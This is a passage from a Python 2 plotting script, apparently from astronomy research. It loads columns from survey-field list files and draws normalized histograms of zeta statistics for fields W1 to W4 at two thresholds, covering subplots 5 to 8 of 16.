unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(456)\nrangemax=7\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(456)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 5\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=11\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(457)\nrangemax=6\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(457)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 6\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=13\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(458)\nrangemax=6\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(458)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 7\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=15\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(459)\nrangemax=7\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(459)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 8\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=17\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % 